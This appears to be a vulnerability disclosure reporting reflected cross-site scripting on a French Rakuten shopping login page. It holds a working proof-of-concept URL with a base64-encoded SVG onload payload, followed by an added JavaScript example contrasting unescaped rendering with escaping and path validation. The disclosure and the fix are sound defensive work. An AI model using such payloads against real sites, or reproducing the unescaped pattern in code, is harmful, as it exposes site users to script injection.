Summary by Poc-as
Summary
I found a cross-site scripting vulnerability on https://fr.shopping.rakuten.com/connect
POC
url : https://fr.shopping.rakuten.com/connect?url="><iframe%20src="data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMSk%2b"></iframe>
Explanation
When I connect to the above URL, the value of the url parameter is inserted into the DOM without escaping, resulting in HTML injection. So I can use this to trigger XSS because HTML injection happens. Thanks
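The flaw class described above, shown from the fixing side. This is an added example, not code from the report or from the affected site: it assumes the `url` value is echoed into an HTML attribute, and the hidden-input markup, function names and sample input are hypothetical.

```javascript
// Added example (hypothetical markup and names): a return-URL parameter
// echoed into a login page, unescaped versus escaped and validated.
const HTML_ESCAPES = {
  "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;",
};

// Encode the characters that can end an attribute value or open a tag.
function escapeHtmlAttr(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Pattern the report describes: the parameter reaches the markup as-is,
// so a quote followed by '>' closes the attribute and starts new HTML.
function renderUnsafe(url) {
  return `<input type="hidden" name="url" value="${url}">`;
}

// Output encoding alone: the same input stays inert attribute text.
function renderEscaped(url) {
  return `<input type="hidden" name="url" value="${escapeHtmlAttr(url)}">`;
}

// Input validation on top: a return URL only needs to be a same-site path.
// Rejects absolute URLs, scheme-relative '//host', backslashes and
// control characters; anything rejected falls back to a fixed path.
function safeReturnPath(url, fallback = "/") {
  if (typeof url !== "string") return fallback;
  if (/[\u0000-\u001f\\]/.test(url)) return fallback;
  if (!url.startsWith("/") || url.startsWith("//")) return fallback;
  return url;
}

// Validate first, then encode for the attribute context.
function renderSafe(url) {
  return renderEscaped(safeReturnPath(url));
}

// Constructed input with the same shape as the reported parameter value.
const sample = '"><iframe src="about:blank"></iframe>';
console.log(renderUnsafe(sample));
console.log(renderEscaped(sample));
console.log(renderSafe(sample));
console.log(renderSafe("/cart?step=2&lang=fr"));
```

Encoding at the point of output is the fix for the injection itself; the path check additionally keeps the parameter from being used as an open redirect target.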